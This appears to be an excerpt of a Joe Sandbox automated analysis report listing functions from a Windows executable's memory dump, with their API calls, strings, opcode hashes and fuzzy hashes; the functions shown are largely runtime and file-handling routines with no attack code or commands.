Function 00007FF61D33C11C Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33C549

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
Instruction ID: 34495b665a8c5f66a67992df6a95ff3e917f44e28e64af993416ffb240cfcfdc
Opcode Fuzzy Hash: 35a62c87d622c24e2edb9aadc987597fb4e04b7ba40dc30474cb3f056ab41b60
Instruction Fuzzy Hash: 8BC1C232A0CF86A1FA65DB1696402BDB7A1EB92FB0F554131DA4E87391EF7CE8458700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328660 Relevance: 10.6, APIs: 7, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF61D328680
OpenProcessToken.ADVAPI32 ref: 00007FF61D328691
GetTokenInformation.KERNELBASE ref: 00007FF61D3286B6
GetLastError.KERNEL32 ref: 00007FF61D3286C0
GetTokenInformation.KERNELBASE ref: 00007FF61D328700
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF61D32871C
CloseHandle.KERNEL32 ref: 00007FF61D328734

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
Instruction ID: f59623401c30de56857ae4bea3c42aa33867f3e4e515885defac46ef0a115632
Opcode Fuzzy Hash: 06365a43b374b09f574a05598fb3349d6b2ba921b35f8f1241a83a55484dca10
Instruction Fuzzy Hash: F2210531A08E4281DB549B69F54416AE3A0FF86BF4F100235EAAD83BE8EF6DE4458750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328980 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF61D328660: GetCurrentProcess.KERNEL32 ref: 00007FF61D328680
Part of subcall function 00007FF61D328660: OpenProcessToken.ADVAPI32 ref: 00007FF61D328691
Part of subcall function 00007FF61D328660: GetTokenInformation.KERNELBASE ref: 00007FF61D3286B6
Part of subcall function 00007FF61D328660: GetLastError.KERNEL32 ref: 00007FF61D3286C0
Part of subcall function 00007FF61D328660: GetTokenInformation.KERNELBASE ref: 00007FF61D328700
Part of subcall function 00007FF61D328660: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF61D32871C
Part of subcall function 00007FF61D328660: CloseHandle.KERNEL32 ref: 00007FF61D328734

LocalFree.KERNEL32(00000000,00007FF61D323B6E), ref: 00007FF61D328A0C
LocalFree.KERNEL32 ref: 00007FF61D328A15

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF61D3289E2
D:(A;;FA;;;%s), xrefs: 00007FF61D3289F7
S-1-3-4, xrefs: 00007FF61D3289C1
Security descriptor string length exceeds PATH_MAX!, xrefs: 00007FF61D328A23

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
API String ID: 6828938-1817031585
Opcode ID: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
Instruction ID: fae47597bb91079dd08e1825b0bd32176e4e30ffead05cc83ad8c7e0ab3a4a3a
Opcode Fuzzy Hash: 205b7d1dfb2922ffea14e43b9fff2feb2a6941106c301a2985194d40b60a609a
Instruction Fuzzy Hash: CB216D31E08E8681F654AB34E8456EAA261AF56BA4F840131F94DD3696EF3CE5458280

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33D620 Relevance: 6.2, APIs: 4, Instructions: 218
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF61D33D60B), ref: 00007FF61D33D73C
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF61D33D60B), ref: 00007FF61D33D7C7

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
Instruction ID: 2a678f951b2cad6bfd127e949445bc6f8cd1f14624c9a0898d37f0a7849b48a6
Opcode Fuzzy Hash: fbcfe551b9719c6229bed95fc105e51a183c6d2ac5964edc4a317e2464c7d24a
Instruction Fuzzy Hash: 9291D672F08E51A5F760CF69A5442BDABA0BB46FA8F144139DE4E97695EF3CE442C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33FDEC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF61D33FEDC
_get_daylight.LIBCMT ref: 00007FF61D33FEED
_get_daylight.LIBCMT ref: 00007FF61D33FEFE
_isindst.LIBCMT ref: 00007FF61D33FFC9

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
Instruction ID: 535446636722555e6ada9848761f5ba6d9d658649edf51ace3aae2cfa01f9adf
Opcode Fuzzy Hash: e30f49420ffe1712ec5869c52a61b1ecc0c505d60627fe33813fae1700624dd7
Instruction Fuzzy Hash: 7A51F973F04A119AFB14CF649A456BCA7A1AF12B78F944135ED1ED2AE5EF3CA442C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D32C17C Relevance: 6.1, APIs: 4, Instructions: 94COMMON

Download Yara Rule

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF61D32C18B

Part of subcall function 00007FF61D32C34C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF61D32C36E

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF61D32C1A0
__scrt_release_startup_lock.LIBCMT ref: 00007FF61D32C20E
__scrt_get_show_window_mode.LIBCMT ref: 00007FF61D32C261

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction ID: be5b5a012e40f2066c07944174a06e0477b1025a5693501a81e50dd05013e44f
Opcode Fuzzy Hash: 3d27f789a7b910ea95b37f95ae633beb093259f17e851dcbb1d336e671b45e8f
Instruction Fuzzy Hash: 32314A31E0DE4341FA24ABF495123BAA2A19F53FA8F485435D94DC72D7FE2DA504C391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D335800 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D33582D
CreateFileW.KERNELBASE ref: 00007FF61D33586C
CloseHandle.KERNEL32 ref: 00007FF61D3358A1

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction ID: c76e368224cf7ea3ee2e2f0eeec5a834400b784b7387c792cf39ac27dbb2d5ed
Opcode Fuzzy Hash: 19df8467f7a43b18326ee2ac63a557c2c76a32838a335a25f0a86c27d9f8de03
Instruction Fuzzy Hash: 4C416332E18B8193E754DB619610369A360FF96B74F109335E65C47AD5EF6CF5A08700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33A0C0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF61D33A0BC), ref: 00007FF61D33A0D1
TerminateProcess.KERNEL32(?,?,?,00007FF61D33A0BC), ref: 00007FF61D33A0DC
ExitProcess.KERNEL32 ref: 00007FF61D33A0EB

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
Instruction ID: f9643b4a6d7fb7c5a14d97e0e5dcacf4e0b1eda3e32a90784609e2678f29ae59
Opcode Fuzzy Hash: bc294a5152b5297a0dc7ed9991a70bb9c76c91c314002c4bf8d40204f2aa0a87
Instruction Fuzzy Hash: FBD09E30F08E0652EB5C6F715D5907992155F5AF21F105838D94B96393EE2EE84E8240

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D328B80 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE ref: 00007FF61D328BC0

Part of subcall function 00007FF61D322C50: MessageBoxW.USER32 ref: 00007FF61D322D25

Strings

Security descriptor is not initialized!, xrefs: 00007FF61D328B90

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: CreateDirectoryMessage
String ID: Security descriptor is not initialized!
API String ID: 73271072-986317556
Opcode ID: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction ID: 7a0a3e103892b06449191f8317f9e63f5b32ed3ef1c6c734dea48a9973b095fc
Opcode Fuzzy Hash: 7287a5cc856ae2fa57a4db52e4db86861a7dba6e4ea9bf89139b42fa57f5051f
Instruction Fuzzy Hash: 84E012B6E18F0686EA209B24EC45269A390BB56B74F801334E55DD77E4FF7CD1198B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33037C Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3303C0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF61D3304B7

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction ID: 05ab3617115e65000a28784c2b18b4eed218cfca6792f6cbe86da07c8851362e
Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
Instruction Fuzzy Hash: C4510671B0DB6196FA28DE36960067AE281BF46FB4F144734DD6D877C5EE3CE5018A00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33B21C Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF61D33B099,?,?,00000000,00007FF61D33B14E), ref: 00007FF61D33B28A
GetLastError.KERNEL32(?,?,?,00007FF61D33B099,?,?,00000000,00007FF61D33B14E), ref: 00007FF61D33B294

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction ID: e0c37269bbf2ebf0e28a1b1596b06a5c0afa5139443ad12b575898d0d4d510dd
Opcode Fuzzy Hash: 5686df961ce5be01fcc4af8e545b06247c6cca85e683b4a0316bb757e052fe91
Instruction Fuzzy Hash: EA21A131B18E8261FAA8D761D69427DD2829F86FF0F044335EA6EC73D5FE6CA4458301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33C7F4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00007FF61D33C98D), ref: 00007FF61D33C840
GetLastError.KERNEL32(?,?,?,?,?,00007FF61D33C98D), ref: 00007FF61D33C84A

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction ID: 344def0ddc6864d62783524e5e48b7ceb5fe4f02aeb80100d98cd883193417c2
Opcode Fuzzy Hash: 1615d75b8a55ba2077c919f2c6a9a881aeaa4cd5e18bf0385e0e14deb18ebfea
Instruction Fuzzy Hash: 2D11BF72A08F8192EA10CB26A944069F361AB46FF4F540331EE7D8B7E9EF7CE1558740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3381BC Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61D338039), ref: 00007FF61D3381DF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF61D338039), ref: 00007FF61D3381F5

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction ID: 6270b3cfa92edeade1b26d8efdea743c8963be94fa7bbcfe4ddf71649bf56f47
Opcode Fuzzy Hash: 29de07117de1aa70c5e10fbbda830c30c6ed8a5e5960b32a887ce46c27fe19fd
Instruction Fuzzy Hash: D3018E3291CA9186E7548F15A40123EF3B0FB82BB1F600235E6AD819D8EF7DD000CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D33B00C Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B022
GetLastError.KERNEL32(?,?,?,00007FF61D343492,?,?,?,00007FF61D3434CF,?,?,00000000,00007FF61D343995,?,?,00000000,00007FF61D3438C7), ref: 00007FF61D33B02C

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ErrorLanguagesLastPreferredRestoreThread
String ID:
API String ID: 588628887-0
Opcode ID: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction ID: 3d936ed92d4fafe7dd0139b3e78fa38dc0c8d5f94813bb938eab075dbe906363
Opcode Fuzzy Hash: fe06ab376566ea2509a2ed287c19ad9540726c08df5295ae3f1b105c90e4bdc3
Instruction Fuzzy Hash: 4EE08C30F08E4292FF1CEBB2984503892919F8AF22F404434C81EC6292FF2CB8898A10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D337F24 Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

RemoveDirectoryW.KERNELBASE ref: 00007FF61D337F28
GetLastError.KERNEL32 ref: 00007FF61D337F32

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: DirectoryErrorLastRemove
String ID:
API String ID: 377330604-0
Opcode ID: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
Instruction ID: 3aa2a8958116cee7cf9cfdbbdb7b00ae17c2b4f2ae7c63a929299f926c3ce450
Opcode Fuzzy Hash: 0f0cb225ea42310d2ea23db7727506bfdece2bdd50c9c3900213f62443c0a817
Instruction Fuzzy Hash: 9ED01230F1DE0393FA1867711D8513991906F56F71F500670C02EC01D0FF2CB0C94211

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D3387A8 Relevance: 3.0, APIs: 2, Instructions: 12fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00007FF61D3387AC
GetLastError.KERNEL32 ref: 00007FF61D3387B6

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction ID: 4b0421820fad178809c2ecaa68f8e341e9f3864be609ba3a83d7c3101a9a2648
Opcode Fuzzy Hash: 153cc6b43260fbfbcd420d4a5d82083cc83b9861f71afd7df965705e15552d8c
Instruction Fuzzy Hash: 02D0C930E19E0391E61867761D4513991A16F56F72F500630C02EC21D0FF2CA0491111

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF61D327D50 Relevance: 1.6, APIs: 1, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF61D328BE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF61D322ABB), ref: 00007FF61D328C1A

_findclose.LIBCMT ref: 00007FF61D327FA9

Memory Dump Source

Source File: 00000000.00000002.1669682832.00007FF61D321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF61D320000, based on PE: true

Associated: 00000000.00000002.1669666227.00007FF61D320000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669705835.00007FF61D34B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D35E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669725984.00007FF61D360000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1669774425.00007FF61D362000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff61d320000_hacn.jbxd

Similarity

API ID: ByteCharMultiWide_findclose
String ID:
API String ID: 2772937645-0
